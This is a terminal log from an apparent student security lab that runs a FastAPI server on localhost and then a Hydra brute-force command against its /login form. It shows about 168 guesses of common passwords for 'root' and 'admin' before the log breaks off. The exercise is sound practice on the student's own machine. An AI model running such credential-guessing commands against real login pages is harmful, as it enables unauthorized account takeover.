
tayyisa@MacBook-Air-asiyat InfoSec % mkdir Lab12
tayyisa@MacBook-Air-asiyat InfoSec % cd Lab12
tayyisa@MacBook-Air-asiyat Lab12 % python3 -m venv venv
source venv/bin/activate
(venv) tayyisa@MacBook-Air-asiyat Lab12 % pip install "fastapi[standard]"

Collecting fastapi[standard]
  Downloading fastapi-0.123.5-py3-none-any.whl.metadata (30 kB)
Collecting starlette<0.51.0,>=0.40.0 (from fastapi[standard])
  Downloading starlette-0.50.0-py3-none-any.whl.metadata (6.3 kB)
Collecting pydantic!=1.8,!=1.8.1,!=2.0.0,!=2.0.1,!=2.1.0,<3.0.0,>=1.7.4 (from fastapi[standard])
  Downloading pydantic-2.12.5-py3-none-any.whl.metadata (90 kB)
Collecting typing-extensions>=4.8.0 (from fastapi[standard])
  Using cached typing_extensions-4.15.0-py3-none-any.whl.metadata (3.3 kB)
Collecting annotated-doc>=0.0.2 (from fastapi[standard])
  Downloading annotated_doc-0.0.4-py3-none-any.whl.metadata (6.6 kB)
Collecting fastapi-cli>=0.0.8 (from fastapi-cli[standard]>=0.0.8; extra == "standard"->fastapi[standard])
  Downloading fastapi_cli-0.0.16-py3-none-any.whl.metadata (6.4 kB)
Collecting httpx<1.0.0,>=0.23.0 (from fastapi[standard])
  Using cached httpx-0.28.1-py3-none-any.whl.metadata (7.1 kB)
Collecting jinja2>=3.1.5 (from fastapi[standard])
  Using cached jinja2-3.1.6-py3-none-any.whl.metadata (2.9 kB)
Collecting python-multipart>=0.0.18 (from fastapi[standard])
  Using cached python_multipart-0.0.20-py3-none-any.whl.metadata (1.8 kB)
Collecting email-validator>=2.0.0 (from fastapi[standard])
  Downloading email_validator-2.3.0-py3-none-any.whl.metadata (26 kB)
Collecting uvicorn>=0.12.0 (from uvicorn[standard]>=0.12.0; extra == "standard"->fastapi[standard])
  Downloading uvicorn-0.38.0-py3-none-any.whl.metadata (6.8 kB)
Collecting anyio (from httpx<1.0.0,>=0.23.0->fastapi[standard])
  Downloading anyio-4.12.0-py3-none-any.whl.metadata (4.3 kB)
Collecting certifi (from httpx<1.0.0,>=0.23.0->fastapi[standard])
  Downloading certifi-2025.11.12-py3-none-any.whl.metadata (2.5 kB)
Collecting httpcore==1.* (from httpx<1.0.0,>=0.23.0->fastapi[standard])
  Using cached httpcore-1.0.9-py3-none-any.whl.metadata (21 kB)
Collecting idna (from httpx<1.0.0,>=0.23.0->fastapi[standard])
  Downloading idna-3.11-py3-none-any.whl.metadata (8.4 kB)
Collecting h11>=0.16 (from httpcore==1.*->httpx<1.0.0,>=0.23.0->fastapi[standard])
  Using cached h11-0.16.0-py3-none-any.whl.metadata (8.3 kB)
Collecting annotated-types>=0.6.0 (from pydantic!=1.8,!=1.8.1,!=2.0.0,!=2.0.1,!=2.1.0,<3.0.0,>=1.7.4->fastapi[standard])
  Using cached annotated_types-0.7.0-py3-none-any.whl.metadata (15 kB)
Collecting pydantic-core==2.41.5 (from pydantic!=1.8,!=1.8.1,!=2.0.0,!=2.0.1,!=2.1.0,<3.0.0,>=1.7.4->fastapi[standard])
  Downloading pydantic_core-2.41.5-cp314-cp314-macosx_11_0_arm64.whl.metadata (7.3 kB)
Collecting typing-inspection>=0.4.2 (from pydantic!=1.8,!=1.8.1,!=2.0.0,!=2.0.1,!=2.1.0,<3.0.0,>=1.7.4->fastapi[standard])
  Using cached typing_inspection-0.4.2-py3-none-any.whl.metadata (2.6 kB)
Collecting dnspython>=2.0.0 (from email-validator>=2.0.0->fastapi[standard])
  Downloading dnspython-2.8.0-py3-none-any.whl.metadata (5.7 kB)
Collecting typer>=0.15.1 (from fastapi-cli>=0.0.8->fastapi-cli[standard]>=0.0.8; extra == "standard"->fastapi[standard])
  Downloading typer-0.20.0-py3-none-any.whl.metadata (16 kB)
Collecting rich-toolkit>=0.14.8 (from fastapi-cli>=0.0.8->fastapi-cli[standard]>=0.0.8; extra == "standard"->fastapi[standard])
  Downloading rich_toolkit-0.17.0-py3-none-any.whl.metadata (1.0 kB)
Collecting fastapi-cloud-cli>=0.1.1 (from fastapi-cli[standard]>=0.0.8; extra == "standard"->fastapi[standard])
  Downloading fastapi_cloud_cli-0.5.2-py3-none-any.whl.metadata (3.3 kB)
Collecting rignore>=0.5.1 (from fastapi-cloud-cli>=0.1.1->fastapi-cli[standard]>=0.0.8; extra == "standard"->fastapi[standard])
  Downloading rignore-0.7.6-cp314-cp314-macosx_11_0_arm64.whl.metadata (4.2 kB)
Collecting sentry-sdk>=2.20.0 (from fastapi-cloud-cli>=0.1.1->fastapi-cli[standard]>=0.0.8; extra == "standard"->fastapi[standard])
  Downloading sentry_sdk-2.47.0-py2.py3-none-any.whl.metadata (10 kB)
Collecting fastar>=0.5.0 (from fastapi-cloud-cli>=0.1.1->fastapi-cli[standard]>=0.0.8; extra == "standard"->fastapi[standard])
  Downloading fastar-0.8.0-cp314-cp314-macosx_11_0_arm64.whl.metadata (4.0 kB)
Collecting MarkupSafe>=2.0 (from jinja2>=3.1.5->fastapi[standard])
  Using cached markupsafe-3.0.3-cp314-cp314-macosx_11_0_arm64.whl.metadata (2.7 kB)
Collecting click>=8.1.7 (from rich-toolkit>=0.14.8->fastapi-cli>=0.0.8->fastapi-cli[standard]>=0.0.8; extra == "standard"->fastapi[standard])
  Using cached click-8.3.1-py3-none-any.whl.metadata (2.6 kB)
Collecting rich>=13.7.1 (from rich-toolkit>=0.14.8->fastapi-cli>=0.0.8->fastapi-cli[standard]>=0.0.8; extra == "standard"->fastapi[standard])
  Downloading rich-14.2.0-py3-none-any.whl.metadata (18 kB)
Collecting markdown-it-py>=2.2.0 (from rich>=13.7.1->rich-toolkit>=0.14.8->fastapi-cli>=0.0.8->fastapi-cli[standard]>=0.0.8; extra == "standard"->fastapi[standard])
  Using cached markdown_it_py-4.0.0-py3-none-any.whl.metadata (7.3 kB)
Collecting pygments<3.0.0,>=2.13.0 (from rich>=13.7.1->rich-toolkit>=0.14.8->fastapi-cli>=0.0.8->fastapi-cli[standard]>=0.0.8; extra == "standard"->fastapi[standard])
  Using cached pygments-2.19.2-py3-none-any.whl.metadata (2.5 kB)
Collecting mdurl~=0.1 (from markdown-it-py>=2.2.0->rich>=13.7.1->rich-toolkit>=0.14.8->fastapi-cli>=0.0.8->fastapi-cli[standard]>=0.0.8; extra == "standard"->fastapi[standard])
  Using cached mdurl-0.1.2-py3-none-any.whl.metadata (1.6 kB)
Collecting urllib3>=1.26.11 (from sentry-sdk>=2.20.0->fastapi-cloud-cli>=0.1.1->fastapi-cli[standard]>=0.0.8; extra == "standard"->fastapi[standard])
  Using cached urllib3-2.5.0-py3-none-any.whl.metadata (6.5 kB)
Collecting shellingham>=1.3.0 (from typer>=0.15.1->fastapi-cli>=0.0.8->fastapi-cli[standard]>=0.0.8; extra == "standard"->fastapi[standard])
  Using cached shellingham-1.5.4-py2.py3-none-any.whl.metadata (3.5 kB)
Collecting httptools>=0.6.3 (from uvicorn[standard]>=0.12.0; extra == "standard"->fastapi[standard])
  Downloading httptools-0.7.1-cp314-cp314-macosx_11_0_arm64.whl.metadata (3.5 kB)
Collecting python-dotenv>=0.13 (from uvicorn[standard]>=0.12.0; extra == "standard"->fastapi[standard])
  Downloading python_dotenv-1.2.1-py3-none-any.whl.metadata (25 kB)
Collecting pyyaml>=5.1 (from uvicorn[standard]>=0.12.0; extra == "standard"->fastapi[standard])
  Downloading pyyaml-6.0.3-cp314-cp314-macosx_11_0_arm64.whl.metadata (2.4 kB)
Collecting uvloop>=0.15.1 (from uvicorn[standard]>=0.12.0; extra == "standard"->fastapi[standard])
  Downloading uvloop-0.22.1-cp314-cp314-macosx_10_13_universal2.whl.metadata (4.9 kB)
Collecting watchfiles>=0.13 (from uvicorn[standard]>=0.12.0; extra == "standard"->fastapi[standard])
  Downloading watchfiles-1.1.1-cp314-cp314-macosx_11_0_arm64.whl.metadata (4.9 kB)
Collecting websockets>=10.4 (from uvicorn[standard]>=0.12.0; extra == "standard"->fastapi[standard])
  Downloading websockets-15.0.1-py3-none-any.whl.metadata (6.8 kB)
Downloading fastapi-0.123.5-py3-none-any.whl (111 kB)
Using cached httpx-0.28.1-py3-none-any.whl (73 kB)
Using cached httpcore-1.0.9-py3-none-any.whl (78 kB)
Downloading pydantic-2.12.5-py3-none-any.whl (463 kB)
Downloading pydantic_core-2.41.5-cp314-cp314-macosx_11_0_arm64.whl (1.9 MB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.9/1.9 MB 7.9 MB/s  0:00:00
Downloading starlette-0.50.0-py3-none-any.whl (74 kB)
Downloading anyio-4.12.0-py3-none-any.whl (113 kB)
Downloading annotated_doc-0.0.4-py3-none-any.whl (5.3 kB)
Using cached annotated_types-0.7.0-py3-none-any.whl (13 kB)
Downloading email_validator-2.3.0-py3-none-any.whl (35 kB)
Downloading dnspython-2.8.0-py3-none-any.whl (331 kB)
Downloading fastapi_cli-0.0.16-py3-none-any.whl (12 kB)
Downloading fastapi_cloud_cli-0.5.2-py3-none-any.whl (23 kB)
Downloading fastar-0.8.0-cp314-cp314-macosx_11_0_arm64.whl (628 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 628.6/628.6 kB 8.0 MB/s  0:00:00
Using cached h11-0.16.0-py3-none-any.whl (37 kB)
Downloading idna-3.11-py3-none-any.whl (71 kB)
Using cached jinja2-3.1.6-py3-none-any.whl (134 kB)
Using cached markupsafe-3.0.3-cp314-cp314-macosx_11_0_arm64.whl (12 kB)
Using cached python_multipart-0.0.20-py3-none-any.whl (24 kB)
Downloading rich_toolkit-0.17.0-py3-none-any.whl (31 kB)
Using cached click-8.3.1-py3-none-any.whl (108 kB)
Downloading rich-14.2.0-py3-none-any.whl (243 kB)
Using cached pygments-2.19.2-py3-none-any.whl (1.2 MB)
Using cached markdown_it_py-4.0.0-py3-none-any.whl (87 kB)
Using cached mdurl-0.1.2-py3-none-any.whl (10.0 kB)
Downloading rignore-0.7.6-cp314-cp314-macosx_11_0_arm64.whl (820 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 820.8/820.8 kB 8.6 MB/s  0:00:00
Downloading sentry_sdk-2.47.0-py2.py3-none-any.whl (411 kB)
Downloading typer-0.20.0-py3-none-any.whl (47 kB)
Using cached shellingham-1.5.4-py2.py3-none-any.whl (9.8 kB)
Using cached typing_extensions-4.15.0-py3-none-any.whl (44 kB)
Using cached typing_inspection-0.4.2-py3-none-any.whl (14 kB)
Using cached urllib3-2.5.0-py3-none-any.whl (129 kB)
Downloading uvicorn-0.38.0-py3-none-any.whl (68 kB)
Downloading httptools-0.7.1-cp314-cp314-macosx_11_0_arm64.whl (108 kB)
Downloading python_dotenv-1.2.1-py3-none-any.whl (21 kB)
Downloading pyyaml-6.0.3-cp314-cp314-macosx_11_0_arm64.whl (173 kB)
Downloading uvloop-0.22.1-cp314-cp314-macosx_10_13_universal2.whl (1.4 MB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.4/1.4 MB 5.6 MB/s  0:00:00
Downloading watchfiles-1.1.1-cp314-cp314-macosx_11_0_arm64.whl (390 kB)
Downloading websockets-15.0.1-py3-none-any.whl (169 kB)
Downloading certifi-2025.11.12-py3-none-any.whl (159 kB)
Installing collected packages: websockets, uvloop, urllib3, typing-extensions, shellingham, rignore, pyyaml, python-multipart, python-dotenv, pygments, mdurl, MarkupSafe, idna, httptools, h11, fastar, dnspython, click, certifi, annotated-types, annotated-doc, uvicorn, typing-inspection, sentry-sdk, pydantic-core, markdown-it-py, jinja2, httpcore, email-validator, anyio, watchfiles, starlette, rich, pydantic, httpx, typer, rich-toolkit, fastapi, fastapi-cloud-cli, fastapi-cli
Successfully installed MarkupSafe-3.0.3 annotated-doc-0.0.4 annotated-types-0.7.0 anyio-4.12.0 certifi-2025.11.12 click-8.3.1 dnspython-2.8.0 email-validator-2.3.0 fastapi-0.123.5 fastapi-cli-0.0.16 fastapi-cloud-cli-0.5.2 fastar-0.8.0 h11-0.16.0 httpcore-1.0.9 httptools-0.7.1 httpx-0.28.1 idna-3.11 jinja2-3.1.6 markdown-it-py-4.0.0 mdurl-0.1.2 pydantic-2.12.5 pydantic-core-2.41.5 pygments-2.19.2 python-dotenv-1.2.1 python-multipart-0.0.20 pyyaml-6.0.3 rich-14.2.0 rich-toolkit-0.17.0 rignore-0.7.6 sentry-sdk-2.47.0 shellingham-1.5.4 starlette-0.50.0 typer-0.20.0 typing-extensions-4.15.0 typing-inspection-0.4.2 urllib3-2.5.0 uvicorn-0.38.0 uvloop-0.22.1 watchfiles-1.1.1 websockets-15.0.1

[notice] A new release of pip is available: 25.2 -> 25.3
[notice] To update, run: pip install --upgrade pip
(venv) tayyisa@MacBook-Air-asiyat Lab12 % nano main.py
(venv) tayyisa@MacBook-Air-asiyat Lab12 % fastapi dev main.py

   FastAPI   Starting development server 🚀
 
             Searching for package file structure from directories with 
             __init__.py files                                          
             Importing from /Users/tayyisa/auca/InfoSec/Lab12
 
    module   🐍 main.py
 
      code   Importing the FastAPI app object from the module with the  
             following code:                                            
 
             from main import app
 
       app   Using import string: main:app
 
    server   Server started at http://127.0.0.1:8000
    server   Documentation at http://127.0.0.1:8000/docs
 
       tip   Running in development mode, for production use: fastapi   
             run                                             


————————————————————OTHER TAB————————————————————


tayyisa@MacBook-Air-asiyat Lab12 % hydra -f -I -V -L usernames.txt -P passwords.txt -s 8000 localhost http-form-post "/login:username=^USER^&password=^PASS^:F=Invalid"

Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-04 04:01:01
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1717 login tries (l:17/p:101), ~108 tries per task
[DATA] attacking http-post-form://localhost:8000/login:username=^USER^&password=^PASS^:F=Invalid
[ATTEMPT] target localhost - login "root" - pass "123456" - 1 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123456789" - 2 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "root" - pass "111111" - 3 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "root" - pass "password" - 4 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "root" - pass "qwerty" - 5 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "root" - pass "admin" - 6 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "root" - pass "abc123" - 7 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "root" - pass "12345678" - 8 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "root" - pass "password1" - 9 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1234567" - 10 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123123" - 11 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1234567890" - 12 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "root" - pass "000000" - 13 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "root" - pass "12345" - 14 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "root" - pass "iloveyou" - 15 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1q2w3e4r5t" - 16 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1234" - 17 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123456a" - 18 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "root" - pass "qwertyuiop" - 19 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "root" - pass "monkey" - 20 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123321" - 21 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "root" - pass "dragon" - 22 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "root" - pass "654321" - 23 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "root" - pass "666666" - 24 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123" - 25 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "root" - pass "myspace1" - 26 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "root" - pass "a123456" - 27 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "root" - pass "121212" - 28 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1qaz2wsx" - 29 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123qwe" - 30 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123abc" - 31 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "root" - pass "tinkle" - 32 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "root" - pass "target123" - 33 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "root" - pass "gwerty" - 34 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1g2w3e4r" - 35 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "root" - pass "gwerty123" - 36 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "root" - pass "zag12wsx" - 37 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "root" - pass "7777777" - 38 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "root" - pass "qwerty1" - 39 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1q2w3e4r" - 40 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "root" - pass "987654321" - 41 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "root" - pass "222222" - 42 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "root" - pass "qwe123" - 43 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "root" - pass "qwerty123" - 44 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "root" - pass "zxcvbnm" - 45 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "root" - pass "555555" - 46 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "root" - pass "112233" - 47 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "root" - pass "fuckyou" - 48 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "root" - pass "asdfghjkl" - 49 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "root" - pass "12345a" - 50 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123123123" - 51 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1q2w3e" - 52 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "root" - pass "qazwsx" - 53 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "root" - pass "computer" - 54 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "root" - pass "aaaaaa" - 55 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "root" - pass "159753" - 56 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "root" - pass "iloveyou1" - 57 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "root" - pass "fuckyou1" - 58 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "root" - pass "princess" - 59 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "root" - pass "789456123" - 60 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "root" - pass "11111111" - 61 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123654" - 62 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "root" - pass "princess1" - 63 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "root" - pass "888888" - 64 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "root" - pass "linkedin" - 65 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "root" - pass "michael" - 66 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "root" - pass "sunshine" - 67 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "root" - pass "football" - 68 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "root" - pass "11111" - 69 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "root" - pass "777777" - 70 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1234qwer" - 71 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "root" - pass "999999" - 72 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "root" - pass "j38ifUbn" - 73 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "root" - pass "monkey1" - 74 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "root" - pass "football1" - 75 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "root" - pass "daniel" - 76 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "root" - pass "azerty" - 77 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "root" - pass "a12345" - 78 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123456789a" - 79 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "root" - pass "789456" - 80 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "root" - pass "asdfgh" - 81 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "root" - pass "love123" - 82 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "root" - pass "abcd1234" - 83 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "root" - pass "jordan23" - 84 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "root" - pass "88888888" - 85 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "root" - pass "12345admin" - 86 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "root" - pass "5201314" - 87 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "root" - pass "12qwaszx" - 88 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "root" - pass "FQRG7CS493" - 89 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "root" - pass "ashley" - 90 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "root" - pass "asdf" - 91 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "root" - pass "asd123" - 92 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "root" - pass "superman" - 93 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "root" - pass "jessica" - 94 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "root" - pass "love" - 95 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "root" - pass "samsung" - 96 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "root" - pass "shadow" - 97 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "root" - pass "blink182" - 98 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "root" - pass "333333" - 99 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "root" - pass "michael1" - 100 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "root" - pass "babygirl1" - 101 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123456" - 102 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123456789" - 103 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "111111" - 104 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "password" - 105 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "qwerty" - 106 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "admin" - 107 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "abc123" - 108 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "12345678" - 109 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "password1" - 110 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1234567" - 111 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123123" - 112 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1234567890" - 113 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "000000" - 114 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "12345" - 115 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "iloveyou" - 116 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1q2w3e4r5t" - 117 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1234" - 118 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123456a" - 119 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "qwertyuiop" - 120 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "monkey" - 121 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123321" - 122 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "dragon" - 123 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "654321" - 124 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "666666" - 125 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123" - 126 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "myspace1" - 127 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "a123456" - 128 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "121212" - 129 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1qaz2wsx" - 130 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123qwe" - 131 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123abc" - 132 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "tinkle" - 133 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "target123" - 134 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "gwerty" - 135 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1g2w3e4r" - 136 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "gwerty123" - 137 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "zag12wsx" - 138 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "7777777" - 139 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "qwerty1" - 140 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1q2w3e4r" - 141 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "987654321" - 142 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "222222" - 143 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "qwe123" - 144 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "qwerty123" - 145 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "zxcvbnm" - 146 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "555555" - 147 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "112233" - 148 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "fuckyou" - 149 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "asdfghjkl" - 150 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "12345a" - 151 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123123123" - 152 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1q2w3e" - 153 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "qazwsx" - 154 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "computer" - 155 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "aaaaaa" - 156 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "159753" - 157 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "iloveyou1" - 158 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "fuckyou1" - 159 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "princess" - 160 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "789456123" - 161 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "11111111" - 162 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123654" - 163 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "princess1" - 164 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "888888" - 165 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "linkedin" - 166 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "michael" - 167 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "sunshine" - 168 of 1717 [child 4] (0/0)
